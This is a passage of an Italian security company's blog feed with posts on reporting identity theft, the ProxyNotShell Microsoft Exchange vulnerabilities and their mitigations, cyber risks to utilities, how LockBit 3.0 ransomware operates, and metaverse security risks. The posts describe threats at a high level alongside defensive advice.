&lt;li&gt;&lt;strong&gt;È difficilmente configurabile anche “l’induzione in errore”&lt;/strong&gt; da parte dell’autore, perché l’accredito delle somme o l’acquisizione delle credenziali avvengono attraverso sistemi automatizzati o l’installazione di software spia.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Il fatto che sia difficile identificare in prima battuta gli autori di questi reati, fa sì che sia ancora più difficile dimostrare che non siamo stati noi a compiere determinate azioni&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;La denuncia per disconoscere i documenti su cui si fondano queste evidenze non presenta un iter semplice.&lt;/p&gt;

&lt;p&gt;Si tratta quindi di reati che vengono sì ricondotti ad altri reati esistenti, ma con ancora una difficoltà e un disaccordo da parte della dottrina su diversi punti.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Perché, però, è concretamente difficile procedere?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Ad esempio, &lt;strong&gt;se anche in astratto sono abbastanza chiari i requisiti della “prova” che bisogna dare per dimostrare il furto, in realtà avere tempestività e correttezza per ottenere la “digital evidence”&lt;/strong&gt; (prove del furto, ma anche delle prime evidenze da allegare alla denuncia) &lt;strong&gt;è tutto meno che facile&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Se non si riesce, per esempio, a risalire all’IP di un profilo falso o comunque a ricollegarsi alla persona fisica che si trova dietro al profilo, non si può ricondurre il reato all’autore e quindi, secondo la Corte di Cassazione, gli eventuali indizi non sono sufficienti per dichiarare che il reato sussiste.&lt;/p&gt;

&lt;p&gt;Non è tutto: spesso &lt;strong&gt;per ottenere l’IP dell’autore del reato occorre la collaborazione internazionale&lt;/strong&gt; del provider che non solo non è scontata, ma dato il vuoto normativo esistente, non è nemmeno esigibile.&lt;/p&gt;

&lt;p&gt;Esiste tra l’altro &lt;strong&gt;un problema di rapporti tra norme diverse: ciò che è un reato per un paese UE può non esserlo per un paese extra-UE, come nel caso della diffamazione. Non ci sono organismi transnazionali di natura regolatoria; manca la tempestività dell’intervento&lt;/strong&gt; per evitare la viralità del contenuto.&lt;/p&gt;

&lt;h2 id=&#34;denunciare-un-furto-d-identità&#34;&gt;Denunciare un furto d’identità&lt;/h2&gt;

&lt;p&gt;Nel caso fossi vittima di furto d’identità, il corpo istituito e a cui fare affidamento è la Polizia Postale. Tra le forze dell’ordine, è la più adatta per la persecuzione dei reati relativi al web ed al digitale.
Il furto d’identità è sempre un reato, per questo il consiglio è quello di denunciare simili attività
direttamente tramite il form che si trova sul &lt;a href=&#34;https://www.commissariatodips.it/segnalazioni/index.html&#34;&gt;sito ufficiale&lt;/a&gt;&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Nuove vulnerabilità di Microsoft Exchange</title>
         <link>https://blog.cybergon.com/posts/nuove-vulnerabilita-microsoft-exchange/</link>
         <pubDate>Thu, 06 Oct 2022 14:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Simone Errico</author>
         
               
             <author>Ilaria Martinelli</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/nuove-vulnerabilita-microsoft-exchange/</guid>
         <description>

&lt;p&gt;Il 30 settembre &lt;strong&gt;Microsoft ha comunicato la presenza di due vulnerabilità nei server Microsoft Exchange&lt;/strong&gt;, utilizzate per la messa in atto di attacchi malevoli. Queste falle sono state precedentemente sfruttate a partire dalla fine di agosto.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/nuove-vulnerabilità-microsoft-exchange/proxynotshell-1.png&#34; alt=&#34;Microsoft Exchange&#34; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;La prima società ad aver identificato e segnalato le falle è stata GTSC&lt;/strong&gt;, società vietnamita che si occupa di sicurezza informatica. Le vulnerabilità nello specifico sono :&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;CVE-2022-41040&lt;/strong&gt;, una vulnerabilità di tipo Server-Side Request Forgery (SSRF)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;CVE-2022-41082&lt;/strong&gt;, una vulnerabilità di tipo Remote Code Execution (RCE).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;La concatenazione di queste due vulnerabilità permette di &lt;strong&gt;eseguire codice arbitrario su un server Exchange avendo a disposizione le credenziali di qualsiasi utente&lt;/strong&gt;. Le richieste web di cui si compone questo attacco sono nello stesso formato di quelle relative alla famigerata vulnerabilità ProxyShell: da qui il nome ProxyNotShell.&lt;/p&gt;

&lt;p&gt;Le somiglianze con la precedente 0-day &lt;a href=&#34;https://blog.cybergon.com/posts/vulnerabilita-critica-microsoft-exchange-mitigation/&#34;&gt;ProxyShell&lt;/a&gt; ci sono: la request-string è infatti la stessa in entrambi i casi. &lt;strong&gt;La principale differenza&lt;/strong&gt; è che, mentre ProxyShell non richiede autenticazione, &lt;strong&gt;per sfruttare ProxyNotShell sono necessarie credenziali, anche non amministrative&lt;/strong&gt;. &lt;strong&gt;La Multi Factor Authentication non è in questo caso rilevante&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;La stessa GTSC ha teorizzato che gli attacchi iniziati ad agosto potessero provenire da un gruppo di cyber criminali cinesi, a causa della codifica della web shell in cinese semplificato. Negli attacchi è stata utilizzata anche la shell web China Chopper, una backdoor che dà agli aggressori la possibilità di riconnettersi in qualsiasi momento a una macchina compromessa, in modo da sfruttarla anche in un secondo momento.&lt;/p&gt;

&lt;p&gt;Queste vulnerabilità riguardano i server Exchange in loco e non quelli in hosting gestiti da Microsoft; tuttavia, molti utenti utilizzano soluzioni combinate, con hardware in sede e in cloud, e per questo gli ambienti ibridi sono tanto vulnerabili quanto i server dislocati in loco.&lt;/p&gt;

&lt;h2 id=&#34;stima-dei-server-vulnerabili&#34;&gt;Stima dei server vulnerabili&lt;/h2&gt;

&lt;p&gt;Secondo le stime, &lt;strong&gt;i server vulnerabili arriverebbero a quasi 250mila&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Nella foto sottostante possiamo notare la suddivisione per regione:&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/nuove-vulnerabilità-microsoft-exchange/proxynotshell-2.png&#34; alt=&#34;Mappa Server colpiti&#34; /&gt;
Fonte: Shodan&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Tra i 10 paesi più a rischio troviamo anche l’Italia&lt;/strong&gt; con poco meno di 10.000 server.&lt;/p&gt;

&lt;h2 id=&#34;azioni-di-mitigazione&#34;&gt;Azioni di mitigazione&lt;/h2&gt;

&lt;p&gt;Microsoft, per aiutare a fermare temporaneamente l’attacco, ha condiviso delle &lt;a href=&#34;https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/&#34;&gt;azioni di mitigazione&lt;/a&gt; da mettere in pratica.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/nuove-vulnerabilità-microsoft-exchange/proxynotshell-3.PNG&#34; alt=&#34;Mitigation ProxyNotShell&#34; /&gt;
Fonte: Microsoft&lt;/p&gt;

&lt;p&gt;A queste &lt;strong&gt;azioni di mitigazione&lt;/strong&gt;, probabilmente, si susseguiranno aggiornamenti per le prossime settimane. &lt;strong&gt;Ad oggi, infatti, non è disponibile ancora nessuna patch&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Se dovessi rilevare una compromissione nel sistema e desiderassi il nostro supporto, puoi mandarci una mail a &lt;strong&gt;sos@cybergon.com&lt;/strong&gt; con i dettagli della richiesta.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Utility e Cyber Security: i rischi del settore</title>
         <link>https://blog.cybergon.com/posts/utility-cyber-security-rischi-settore/</link>
         <pubDate>Thu, 29 Sep 2022 14:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Ilaria Martinelli</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/utility-cyber-security-rischi-settore/</guid>
         <description>

&lt;p&gt;Le ultime settimane hanno registrato &lt;strong&gt;diversi attacchi ad aziende operanti nel settore utility&lt;/strong&gt;, settore da sempre considerato di grande interesse se volgiamo lo sguardo anche oltreoceano.&lt;/p&gt;

&lt;p&gt;Cerchiamo quindi di capire quali sono &lt;strong&gt;i rischi a cui le aziende operanti sono esposte&lt;/strong&gt; e come queste ultime possono cercare di &lt;strong&gt;proteggere le proprie infrastrutture&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/utility-cybersecurity/utilities-copertina.png&#34; alt=&#34;Utility e cyber security&#34; /&gt;&lt;/p&gt;

&lt;h2 id=&#34;attacchi-al-settore&#34;&gt;Attacchi al settore&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Il settore delle utility, e in particolare quello energetico, si è classificato al quarto posto tra quelli più colpiti nel 2021&lt;/strong&gt;, con l’8,2% di tutti gli attacchi osservati, al quarto posto dopo l’industria manifatturiera, il settore finanziario e quello dei servizi professionali. (Secondo un’analisi di X-Force Threat Intelligence Index 2022)&lt;/p&gt;

&lt;p&gt;Parlando di attacchi al settore, non si può non citare quello all’&lt;strong&gt;oleodotto di Colonial Pipeline, negli Stati Uniti&lt;/strong&gt;, che colpì in modo silenzioso le infrastrutture dell’azienda petrolifera, bloccando circa 8.850 chilometri di condutture che garantivano quasi metà degli approvvigionamenti di carburante della East Coast e paralizzando forniture di circa 2.5 milioni di barili al giorno di prodotti petroliferi. Ad oggi, si tratta di uno degli attacchi più gravi mai registrati.&lt;/p&gt;

&lt;p&gt;Quanto successo negli Stati Uniti non può considerarsi un caso isolato, poiché sia in America che in Europa sono state tante le aziende colpite, partendo dalla greca DESFA, passando per la lussemburghese Creos e concludendo anche con i recenti attacchi ad aziende italiane.&lt;/p&gt;

&lt;p&gt;Questo &lt;strong&gt;trend sta aumentando&lt;/strong&gt; sempre di più &lt;strong&gt;anche in seguito al conflitto russo-ucraino e alla cyber war&lt;/strong&gt; che ne è scaturita conseguentemente.&lt;/p&gt;

&lt;p&gt;A livello globale le previsioni di spesa in temi di sicurezza informatica proprio nel settore delle utilities sono comunque in crescita: secondo i risultati di “The State of Cyber &amp;amp; Digital Security”, &lt;strong&gt;la spesa globale delle aziende operanti nell’industria e proprietarie di infrastrutture critiche raggiungerà i 23 miliardi di dollari entro la fine del 2022, per superare i 36 miliardi di dollari nel 2027&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Un altro elemento che salta all’occhio riguarda la percezione degli addetti ai lavori riguardo al tema: chi ha subito una violazione è maggiormente propenso ad investire in sicurezza informatica e a prendere decisioni più consapevoli, priorizzando gli investimenti verso servizi altamente qualificati.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/utility-cybersecurity/utilities-1.png&#34; alt=&#34;Investment decisions in cyber security&#34; /&gt;
Fonte: DNV – The Cyber Priority&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;In Italia la situazione non si discosta di molto dal resto del mondo&lt;/strong&gt;. Solo per il settore utility, infatti, &lt;strong&gt;gli attacchi registrati sono tra il 5% e il 7% dei totali&lt;/strong&gt;. Inoltre, &lt;strong&gt;le prime 100 utility italiane, negli ultimi tre anni, hanno registrato più di 250 minacce informatiche di entità medio-grave&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Le tipologie di attacco sono principalmente due: quelle che hanno il solo obiettivo di estorcere denaro e quelle che sono volte a disinformare o bloccare le forniture energetiche per motivi di natura politica.&lt;/p&gt;

&lt;p&gt;Il settore sta quindi facendo fronte alle crescenti minacce investendo molto in tema di digitalizzazione, in particolare nelle capacità di affrontare ed identificare i punti in cui i loro progetti e le loro operazioni sono esposti alle minacce informatiche, prima che queste vengano scoperte dai cyber criminali.
&lt;strong&gt;La consapevolezza, però, non procede di pari passo ad un’adeguata strategia di difesa o prevenzione&lt;/strong&gt;. Il 60% dei manager sono consapevoli che la loro organizzazione risulta vulnerabile, ma solo il 40% prevede di apportare miglioramenti urgenti nei prossimi anni.&lt;/p&gt;

&lt;h2 id=&#34;best-practice&#34;&gt;Best practice&lt;/h2&gt;

&lt;p&gt;Esistono alcune &lt;strong&gt;best practice per cercare di mitigare il rischio di un attacco informatico&lt;/strong&gt; e, più nello specifico, l’impatto che questo può avere per il business.
Nel caso del settore utility, &lt;strong&gt;vanno considerati anche gli eventuali impatti sugli utenti finali&lt;/strong&gt;, nel caso in cui venissero privati di alcuni servizi ormai ritenuti essenziali per periodi più o meno lunghi, a seconda della gravità dell’attacco.&lt;/p&gt;

&lt;p&gt;Alcuni degli aspetti più importanti che vanno considerati nell’implementazione di una strategia security-oriented riguardano quindi :&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;l’&lt;strong&gt;integrazione di piani di investimenti&lt;/strong&gt; dedicati all’ambito security all’interno della progettazione dei processi&lt;/li&gt;
&lt;li&gt;la continua creazione di &lt;strong&gt;consapevolezza sui rischi e sulle minacce informatiche tra i dipendenti&lt;/strong&gt; (in un nostro articolo approfondiamo il &lt;a href=&#34;https://blog.cybergon.com/posts/cyber-security-awareness-quando-il-fattore-umano-puo-ridurre-il-rischio-di-un-attacco-informatico/&#34;&gt;tema&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;la creazione di &lt;strong&gt;modelli di gestione in caso di incident ed emergenze&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;In Europa si è deciso di investire più decisamente in ambito cyber security in alcuni settori critici, tra cui rientra anche quello delle utility; &lt;strong&gt;la Commissione Europea ha così introdotto delle norme sulla sicurezza informatica&lt;/strong&gt; dei sistemi di rete e di informazione, denominate Direttive NIS 2, &lt;strong&gt;ampliando l’ambito di applicazione&lt;/strong&gt; della Direttiva NIS, in modo da implementare una procedura che fosse uguale per tutti gli stati membri.&lt;/p&gt;

&lt;p&gt;L’obiettivo è quello di lavorare su due fronti: da un lato continuare a monitorare il trend degli attacchi da un punto di vista tecnico, dall’altro agire con strumenti di soft law, normative e direttive per allontanare il pericolo di subire le conseguenze disastrose nel caso in cui si subisca un attacco. Questa seconda strategia, in particolare, tenta di normare quelle situazioni in cui è ancora difficile definire il cyber-spazio che, per sua definizione, non ha confini ben chiari.&lt;/p&gt;

&lt;h2 id=&#34;in-conclusione&#34;&gt;In conclusione&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Nel 2019 le spese per la sicurezza informatica sono state il 15% degli investimenti sui sistemi operativi&lt;/strong&gt; e, al contrario di quello che ci si potrebbe aspettare, &lt;strong&gt;non c’è correlazione tra dimensione aziendale e percentuale degli investimenti destinati alla cyber security&lt;/strong&gt;. Tuttavia, &lt;strong&gt;la correlazione esiste&lt;/strong&gt;, ed è parecchio robusta, &lt;strong&gt;tra il livello di cyber security e gli attacchi subiti&lt;/strong&gt;: più le aziende hanno subito minacce o attacchi, maggiore è avvertita la necessità di investire su questi temi.&lt;/p&gt;

&lt;p&gt;Il raggiungimento di uno stato di maturità inerente questo settore è “work in progress”, anche perché il mondo della sicurezza informatica è esso stesso in continuo cambiamento.&lt;/p&gt;

&lt;p&gt;Quali sono quindi &lt;strong&gt;i consigli che possiamo dare&lt;/strong&gt;?&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Allocare all’interno del proprio budget una parte da dedicare alla sicurezza informatica che corrisponda al reale bisogno aziendale, senza compromessi&lt;/li&gt;
&lt;li&gt;Determinare i propri punti di debolezza e cercare di investire per poterli risolvere o quantomeno mitigare&lt;/li&gt;
&lt;li&gt;Investire non solo in nuove tecnologie, ma anche in formazione&lt;/li&gt;
&lt;/ul&gt;
</description>
       </item>
       
       <item>
         <title>LockBit: la nuova versione 3.0</title>
         <link>https://blog.cybergon.com/posts/lockbit-la-nuova-versione-30/</link>
         <pubDate>Thu, 28 Jul 2022 14:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Domenico Orlando</author>
         
               
             <author>Ilaria Martinelli</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/lockbit-la-nuova-versione-30/</guid>
         <description>

&lt;p&gt;Fino a qualche anno fa, quando si parlava di attacco informatico si faceva riferimento al singolo che operava individualmente; con gli anni però la situazione è cambiata: &lt;strong&gt;sono iniziate a nascere delle vere e proprie organizzazioni criminali&lt;/strong&gt; che si sono poi specializzate in diverse tipologie di crimine informatico.&lt;/p&gt;

&lt;p&gt;L’obiettivo comune a tutti i gruppi criminali rimane comunque l’esfiltrazione di dati e la richiesta di riscatto, per il mero guadagno economico.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Queste organizzazioni, con il passare degli anni, sono diventate sempre più strutturate e ramificate&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/lockbit/lockbit-copertina.png&#34; alt=&#34;LockBit 3.0&#34; /&gt;&lt;/p&gt;

&lt;h2 id=&#34;chi-è-lockbit-e-come-agisce&#34;&gt;Chi è LockBit e come agisce&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Una tra le più famose cyber gang è LockBit&lt;/strong&gt;, menzionata ultimatamente per svariate violazioni ad aziende italiane, sia private che pubbliche. Il gruppo ha infettato migliaia di dispositivi, tanto da &lt;strong&gt;affermarsi come cyber gang d’élite nelle comunità underground&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Negli anni si è evoluta&lt;/strong&gt;, passando da LockBit a LockBit 3.0 &lt;strong&gt;per via delle “migliorie” messo in campo&lt;/strong&gt;. Prima di raccontare quali sono le novità di LockBit 3.0 facciamo però un veloce excursus sul gruppo criminale.
LockBit è il nome del &lt;strong&gt;ransomware nato a settembre 2019 che ha come obiettivo quello di compromettere le reti delle vittime, rendendo indisponibili file e documenti presenti nei dispositivi colpiti&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;LockBit è anche il nome del gruppo criminale&lt;/strong&gt; che è diventato famoso, oltre che per sfruttare l’omonimo ransomware, soprattutto per &lt;strong&gt;operare in modalità Ransomware as a Service (RaaS)&lt;/strong&gt;, un vero e proprio modello di business che si basa sull’affiliazione, il cui fine è quello dell’estorsione.&lt;/p&gt;

&lt;p&gt;I creatori di LockBit “affittano” il ransomware a gruppi affiliati che quindi possono utilizzarlo per compiere i loro attacchi, generando in maniera autonoma anche nuove varianti, selezionando e gestendo le vittime, trattando i riscatti, ottenendo le statistiche e decifrando i file.&lt;/p&gt;

&lt;p&gt;Negli anni il metodo di attacco si è affinato tanto da diventare uno dei gruppi criminali più temuti.
In particolare, l’attacco avviene più o meno con le stesse modalità:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Selezione vittima&lt;/li&gt;
&lt;li&gt;Intrusione&lt;/li&gt;
&lt;li&gt;Esfiltrazione&lt;/li&gt;
&lt;li&gt;Esecuzione&lt;/li&gt;
&lt;li&gt;Trattativa&lt;/li&gt;
&lt;/ul&gt;

&lt;h2 id=&#34;lockbit-3-0-le-novità&#34;&gt;LockBit 3.0: le novità&lt;/h2&gt;

&lt;p&gt;Nelle ultime settimane si è sentito spesso parlare di LockBit nella sua nuova versione 3.0. &lt;strong&gt;Quali sono quindi le novità?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;In primis &lt;strong&gt;la possibilità da parte di chiunque di segnalare eventuali vulnerabilità del ransomware in cambio di un compenso monetario&lt;/strong&gt;; si parla di un &lt;strong&gt;vero e proprio programma “bug bounty”&lt;/strong&gt;, cioè di riconoscimenti e ricompense per la segnalazione di bug. In questo modo gli sviluppatori hanno la possibilità di risolvere eventuali falle prima che diventino di dominio pubblico.&lt;/p&gt;

&lt;p&gt;Inoltre, &lt;strong&gt;la vittima ora può pagare per estendere il countdown per la pubblicazione dei dati, per distruggere le informazioni esfiltrate o per ottenere l’accesso al download esclusivo dei dati in qualsiasi momento&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Infine, &lt;strong&gt;cambia anche il metodo di estorsione&lt;/strong&gt;: la cyber gang infatti mette anche a disposizione la possibilità di pagare i riscatti in criptovaluta Zcash che garantisce privacy e anonimato, rendendo ancora più complesso il tracciamento del pagamento anche rispetto ai Bitcoin.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/lockbit/lockbit-1.png&#34; alt=&#34;LockBit 3.0&#34; /&gt;&lt;/p&gt;

&lt;h2 id=&#34;come-funziona-il-ransomware&#34;&gt;Come funziona il ransomware&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;L&amp;rsquo;intrusione all&amp;rsquo;interno della rete avviene in maniera variabile a seconda del sistema attaccato&lt;/strong&gt;.
I principali metodi risultano essere:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Campagne phishing&lt;/li&gt;
&lt;li&gt;Bruteforce su credenziali RDP o VPN&lt;/li&gt;
&lt;li&gt;Vulnerabilità critiche&lt;/li&gt;
&lt;li&gt;Credenziali acquistate/insiders&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Una volta ottenuto l&amp;rsquo;accesso alla rete, &lt;strong&gt;LockBit è in grado di propagarsi automaticamente ed attivarsi sfruttando le Group Policy e gli strumenti di red teaming&lt;/strong&gt;, come Cobalt Strike.&lt;/p&gt;

&lt;p&gt;Una delle peculiarità del ransomware è l&amp;rsquo;&lt;strong&gt;efficienza di crittografia&lt;/strong&gt;: infatti LockBit è in grado di bloccare l&amp;rsquo;intera rete in pochi minuti, sfruttando il malware StealBit sia per il blocco che per l&amp;rsquo;esfiltrazione dei dati.&lt;/p&gt;

&lt;p&gt;I file vengono criptati in AES sfruttando la funzione BCryptGenRandom per la sua chiave, la quale viene successivamente criptata in RSA.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Il gruppo LockBit&lt;/strong&gt;, soprattutto con la sua nuova versione, &lt;strong&gt;è riuscito a raccogliere informazioni ed imparare dai competitors, implementando al suo interno diverse tecniche già viste in altri ransomware&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;È in grado di visualizzare le stampanti presenti nella rete (sfruttando l&amp;rsquo;API WinSpool) e stampare le richieste di riscatto, ispirandosi al ransomware Egregor;&lt;/li&gt;
&lt;li&gt;È in grado di verificare se le unità di rete sono pronte e attive per l&amp;rsquo;esecuzione del ransomware, inviando pacchetti Wake-on-LAN, ispirandosi al ransomware Ryuk;&lt;/li&gt;
&lt;li&gt;La sua esecuzione è protetta da password, come già visto nel popolare ransomware BlackCat;&lt;/li&gt;
&lt;li&gt;Gran parte dei payload sono file Windows PE, elemento caratteristico dei ransomware della famiglia BlackMatter.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Andando più nello specifico, la nuova versione di LockBit, oltre al bug bounty program e al nuovo blog, è anche caratterizzato da &lt;strong&gt;una grossa evoluzione nelle tecniche evasive&lt;/strong&gt;: inizialmente il malware risiede nella heap memory e utilizza salti indiretti per eseguire le funzioni, tuttavia gli indirizzi dei salti vengono offuscati tramite una particolare tecnica basata sull&amp;rsquo;operatore XOR.&lt;/p&gt;

&lt;p&gt;Inoltre, sono state implementate diverse tecniche di rilevazione di debugger.&lt;/p&gt;

&lt;p&gt;L&amp;rsquo;ultima versione è inoltre in grado di agire anche su sistemi Linux, ampliando il numero di target in pericolo.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/lockbit/lockbit-3.png&#34; alt=&#34;LockBit 3.0&#34; /&gt;
Fonte: TrendMicro&lt;/p&gt;

&lt;h2 id=&#34;come-difendersi&#34;&gt;Come difendersi&lt;/h2&gt;

&lt;p&gt;Come per tutti gli attacchi ransomware ci sono &lt;strong&gt;alcuni accorgimenti che è possibile mettere in pratica per evitare, o almeno mitigare, i danni che un attacco simile può provocare&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Utilizzare password complesse e cambiarle spesso&lt;/li&gt;
&lt;li&gt;Impostare l’autenticazione a più fattori&lt;/li&gt;
&lt;li&gt;Mantenere aggiornati i sistemi operativi&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;LockBit, così come gran parte dei gruppi criminali, chiede il pagamento del riscatto per evitare che i dati esfiltrati vengano pubblicati e/o rivenduti. Questa pratica è caldamente sconsigliata perché non solo alimenta un gruppo criminale, ma soprattutto non è garanzia né di esclusività della vendita dei dati nel dark web né di immunità dell’azienda da attacchi futuri.&lt;/p&gt;

&lt;p&gt;Inoltre, pagando il riscatto si finanziano ulteriormente le operazioni delle cyber gang che sono incoraggiate a prendere di mira nuove vittime.&lt;/p&gt;

&lt;p&gt;Nel caso in cui anche queste accortezze non fossero servite ad evitare l’attacco, è sempre consigliato affidarsi a degli specialisti del settore.&lt;/p&gt;

&lt;p&gt;Per qualsiasi chiarimento o in caso di attacco puoi contattarci a sos@cybergon.com, il nostro team opera in modalità &lt;sup&gt;24&lt;/sup&gt;&amp;frasl;&lt;sub&gt;7&lt;/sub&gt;.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>La sicurezza informatica nel metaverso</title>
         <link>https://blog.cybergon.com/posts/la-sicurezza-informatica-nel-metaverso/</link>
         <pubDate>Mon, 04 Jul 2022 14:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Ilaria Martinelli</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/la-sicurezza-informatica-nel-metaverso/</guid>
         <description>

&lt;p&gt;“The metaverse is here, and it’s not only transforming how we see the world but how we participate in it – from the factory floor to the meeting room.” Satya Nadella&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/la-sicurezza-informatica-nel-metaverso/metaverso-copertina.png&#34; alt=&#34;Metaverso_Sicurezza_Informatica&#34; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Metaverso&lt;/strong&gt; o anche mondo virtuale è un concetto coniato da Neal Stephenson nel libro “Snow Crash” (1992), &lt;strong&gt;nato dall’unione dei termini “meta” (dentro) e “verso” (universo)&lt;/strong&gt;, in cui l’autore descrive questo mondo come una sorta di &lt;strong&gt;realtà virtuale condivisa tramite internet&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Il metaverso è quindi un universo digitale&lt;/strong&gt;, frutto di elementi quali la realtà aumentata e la realtà virtuale, &lt;strong&gt;in continua evoluzione&lt;/strong&gt; grazie ai contributi di chi condivide questa esperienza, e tramite cui gli utenti accedono con un visore e vivono delle vere e proprie esperienze virtuali totalmente immersive.&lt;/p&gt;

&lt;p&gt;Secondo &lt;a href=&#34;https://www.accenture.com/it-it/insights/technology/technology-trends-2022?c=acn_glb_technologyvisiogoogle_12882629&amp;amp;n=psgs_0322&amp;amp;gclid=CjwKCAjw2rmWBhB4EiwAiJ0mtaUKQ23Gl966s9mNGE8J2t2FJ8DigEu5gFT4lW_Xi56ag_4KhgvZnRoCdlEQAvD_BwE&#34;&gt;un report di Accenture&lt;/a&gt;, &lt;strong&gt;il 71% delle imprese ha affermato che il metaverso avrà sicuramente un impatto positivo per il loro business; di queste, il 28% parla di vera e propria rivoluzione&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/la-sicurezza-informatica-nel-metaverso/metaverso-1.PNG&#34; alt=&#34;Metaverso_Impatto_Organizzazioni&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Basti pensare che nel metaverso “vivono” già 350 milioni di persone, ed esistono circa 43 mondi digitali.
In Italia siamo ancora in una fase inziale, anche se le aziende più innovative stanno già cercando di relazionarsi con i consumatori sperimentandone l’utilizzo.&lt;/p&gt;

&lt;h2 id=&#34;rischi-nel-metaverso&#34;&gt;Rischi nel metaverso&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Nonostante questo mondo attiri l’attenzione di molti utenti, esistono alcuni pericoli&lt;/strong&gt; che possono nascere in questo contesto e che, in particolare, riguardano:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Il furto di informazioni&lt;/strong&gt;: la condivisione di informazioni sensibili, anche in modo inconsapevole, porta i cyber criminali a sentirsi al sicuro nel rubare questo genere di dati, mettendo a rischio le proprietà virtuali e non degli utenti anche nella vita reale;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;La personificazione&lt;/strong&gt;: la reperibilità delle informazioni sensibili online permette ai cyber criminali di impersonare terze parti e ottenere informazioni personali con l’inganno;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Il furto d’identità&lt;/strong&gt;: nel caso di furto d’identità, il cyber criminale sarebbe libero di compiere diverse azioni per conto della vittima che ne risponderebbe nella vita ”fisica”.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Se da un lato già esistono rischi per gli utenti privati, dall’altro inizieranno a nascere anche per quelle aziende che vogliono esplorare nuove strategie digitali, per questo motivo è importante cercare di limitare sin dall’inizio le possibili vulnerabilità.&lt;/p&gt;

&lt;p&gt;Esistono alcuni settori che si prestano in particolar modo all’esplorazione del metaverso, poiché permettono la scoperta di ambienti virtuali ai propri consumatori per far vivere esperienze diverse ed uniche:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Media ed intrattenimento&lt;/strong&gt;: eventi, concerti e celebrazioni virtuali sono solo alcune delle esperienze già organizzate in ambienti come Minecraft. Il metaverso può essere una realtà estremamente interessante per molti organizzatori di eventi, poiché permetterebbe di connettere individui in situazioni in cui gli eventi di persona nonsono possibili. Garantirebbe inoltre accesso a delle esperienze uniche, come la partecipazione a partite di basketball o football viste da bordo campo.&lt;/li&gt;
